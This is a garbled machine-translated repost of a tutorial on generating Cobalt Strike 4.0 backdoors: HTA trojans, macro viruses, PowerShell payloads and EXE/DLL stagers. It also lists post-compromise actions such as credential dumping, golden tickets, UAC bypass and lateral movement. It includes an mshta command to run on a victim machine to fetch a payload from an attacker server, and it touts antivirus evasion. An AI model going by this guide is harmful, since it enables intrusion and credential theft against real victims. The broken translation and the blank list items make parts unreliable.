Shulou(Shulou.com)05/31 Report--

This article shows you how CobalStrike 4.0 generates backdoors and what the basic operation is after the host is online. The content is concise and easy to understand. It will definitely make your eyes shine. I hope you can gain something through the detailed introduction of this article.

Steps: Attacks-> Packages-> as follows:

HTML Application generates malicious HTA Trojan files

MS Office Macro generates office macro virus files

Payload Gene rator generates payloads in various languages;

Windows Executable generates executable exe Trojans;

Windows Executable (5) generates a stateless executable exe trojan.

1.HTML Application

Generating malicious HTA Trojan files

An HTML Application is a Windows program written using HTML and a scripting language supported by Internet browsers. The package generates an HTML application that runs a CobaltStrikePayload. You can select the executable option to get an HTML application that lands an executable file on disk and runs it.

Select PowerShell option to get an HTML app

The app uses PowerShell to run a payload. Use the VBA option to silently spawn an instance of Microsoft Excel and run a malicious macro to inject the payload into memory.

Creating an HTML application

Attacks -> Packages -> Html Application

There are three ways of working.

executable (generate executable attack scripts)

powershell (script to generate a powershell)

VBA (generate a script for vba, execute with mshta command)

Here, we learn from an online method to generate a powershell, because the two ways to go online are unsuccessful, and then use it with host file.

Then it generates a URL to copy to

http://x.x.x.x:8008/download/file.ext

and run it on the victim machine.

mshta http://x.x.x.x:8008/download/file.ext

Then CS can receive online.

2. MS Office Macro

This package generates a Microsoft Office macro file and provides instructions for embedding macros in Microsoft Word or Microsoft Excel. This article refers to the macro file making section of my fishing section.

3.payload Generator

This package allows you to export Cobalt Strike stagers in a variety of formats.

Run Attacks -> packages --> payload generator

This module can generate backdoor payloads in n languages, including C, C#,Python,Java,Perl,Powershell scripts, Powershell commands, Ruby,Raw, shellcode in Veli, etc.…

In the process of infiltrating Windows hosts, Powershell and Powershell Command are used more often, mainly because they are convenient and easy to use, and can escape the detection and killing of antivirus software (AV).

Take Power rshell Command as an example, the payload generated is a series of commands, as long as the host executes this series of commands (the host needs to install Power rshell), cs can receive the beacon of the host

4. Windows Executable

This package generates a Windows executable Ar fact that delivers a payload stage r. This package gives you a variety of output options.

Windows Serv ice EXE is a Windows executable file that responds to the Service Cont rol Manage r command. You can use this executable as an invoker of Windows services using sc commands, or generate a custom executable using the Metasploit framework's PsExec module.

That is to say, ordinary EXE and server startup call EXE is different. EXE generated by Windows ServiceEXE can only be used as a service self-starting EXE, EXE generated by Windows exe in Cobalt Strike cannot be used as a service self-starting EXE program (because it cannot respond to Service Control Manager)

Windows DLL (32-bit) is an x86 Windows DLL.

Windows DLL (64-bit) is an x64 Windows DLL. This DLL spawns a 32-bit process and migrates your listeners to it. Both DLL options export a start feature that is compatible with rundll32.exe. Use rundll32.exe to load your DLL from the command line. Check the Use x64 payload box to generate an x64Ar compact that matches the x64 stager. Check the Sign executable file box to sign an EXE or DLL artifact with a code-signed certificate. You must specify a certificate. You must specify the certificate in the C2 extension file.

The above says a lot, but the practice is very simple, just need to confirm whether the victim's computer is X64 or X32 directly run the exe file we generated

5.Windows Executable(s)

The package directly exports Beacon (also known as payload stage), which is a 32-or 64-bit DLL written by the author. It is an executable file that does not use stager, and directly connects with the listener, transmits data and commands. A payload Ar fact that does not use stagers is called a phase-free Ar fact. The package also has the Power rShell option to export Beacon as a PowerShell script, or the raw option to export location-independent beacon code.

By default, this dialog exports the x86 payload stage. Check the Use x64 payload box to generate an x64 stage using x64 Ar artifact. Check the Sign executable file box to sign an EXE or DLL Artifact with a code-signed certificate.

Here's an attempt to generate a powershell horse

But it is not feasible to run directly after generation

Here's where he changes his strategy.

Only administrators have permission to change this policy. Non-administrators report errors. To view script execution strategies, you can do so by:

PS E:> Get-ExecutionPolicy

Change script execution policy by

PS E:> Get-ExecutionPolicyRestrictedPS E:> Set-ExecutionPolicy UnRestricted

Then perform again:

CS4.0 Operation after On-line Machine

Right-click menu:

I. Interact

enter operation command

II. Access

Dump Hashes #Get hashElevate #Elevate Golden Ticket #Generate Gold Ticket Inject Current Session Make token #Credential Conversion Run Mimikatz #Run MimikatzSpawn As #Generate Cobalt Strike Listeners with Other Users

III. Explore

Browser Pivot #Hijacking Target Browser Process Desktop(VNC) #Desktop Interactive File Browser #File Browser Net View #Command Net ViewPort Scan #Port Scan Process List #Process List Screenshot #Screenshot

IV. Pivoting

SOCKS Server#Proxy Services Listener #Reverse Port Forwarding Deploy VPN #Deploy VPN

5. Spawn

External listener (e.g. assigned to MSF, get meterpreter privileges)

VI. Session

Note #Note color #Mark color Remove #Delete Sleep #Specify the sleep time of the controlled end, default 60 seconds, let the controlled end download a task every 10 seconds. The actual frequency should not be too fast, easy to be found. (heartbeat time)Exit #Exit

Interact Actions performed after beacon is turned on:

1. argument Process parameter spoofing 2. blockdlls block the process load from Microsoft DLL3. browserpivot note victim browser process 4. bypass UAC upgrade privileges 5. cancel Cancels downloads in progress 6. CD Switch Records 7. checkin Force the controlled terminal to connect back once 8. clear Clear the task queue inside beacon 9. connect Connect to a Beacon peer over TCP10. Covert VPN Deployment Covert VPN Client 11. 12. - dcsync extracts password hashes from DC 13. desktop Remote Desktop (VNC)14. dllinject Reflect DLL Note Process 15. dllload loads DLL into process using LoadLibrary 16. download 17. downloads Lists downloads in progress 18. drives List target letters 19. elevate exp20. execute Execute the program on the target (output 21. execute-assembly Executes native. NET programs in memory on the target 22. 23. - getprivs Enable system privileges on current token24. getsystem Attempt to get SYSTEM privileges 25. getuid Get user ID 26. hashdump password hash value 27. 28. - 29. Inject the process into a conversation. jobkill ends a background task 30. jobs List background tasks 31. keranthus_ccache_use A ticket derived from a ccache file should be used for this session 32. keranthus_ticket_purge Clear tickets for the current session 33. keranthus_ticket_use Apply Tickets derived from ticket files should be used for this session 34. 35. - 36. - link Connect to a Beacon peer over a named pipe37. logonpasswords uses mimikatz to dump credentials and hash values 38. 39. - make_token Create a token to pass credentials 40. mimikatz 41. Mkdir Create a record 42. mode dns Use DNS A as the communication channel (DNS beacon only)43. mode dns-txt Use DNS TXT as a communication channel (D beacon only)44. mode dns6 Use DNS AAAA as a communication channel (DNS beacon only)45. mode http uses HTTP as a communication channel 46. 47. - 48. -- Note 49. portscan in progress End scan 50. powerpick executing commands via Unmanaged PowerShell 51. powershell Executing commands via powershell.exe 52. powershell-import guide powershell script 53. ppid Set parent PID for spawned post-ex jobs54. 55. - psexec Use a service to spawn a session on a host56. psexec_psh Use PowerShell to spawn a session on a host57. psinject Executes PowerShell commands in a specific process 58. pth uses Mimikatz to transmit hash 59. 60. - reg Query the registry61. 62. - rm Delete a file or file folder 63. 64. - run Run program on target (return output)65. runas Executing programs with other user rights 66. runasadmin Executes programs under privileges 67. runu Execute a program under another PID68. 69. - 70. - 71. - 72. - Shspawn starts a process and assigns a shellcode to it. 73. 74. - 75. - socks stop SOCKS 76. spawn Spawn a session77. spawnas Spawn a session as another user78. spawnto Set executable to spawn processes into79. spawnu Spawn a session under another PID80. ssh enables ssh to connect to remote hosts 81. Ssh-key uses the key to connect to the remote host 82. Steal_token Steals tokens from processes 83. timestomp The timestamp of one file should be transferred to another file 84. unlink Disconnect from parent Beacon85. 86. - Wdigest uses mimikatz to dump credentials 87. 88. - wmi enables WMI to penetrate horizontally. The above content is CobalStrike 4.0. Several ways to generate backdoors and what is the basic operation after the host is online. Have you learned knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.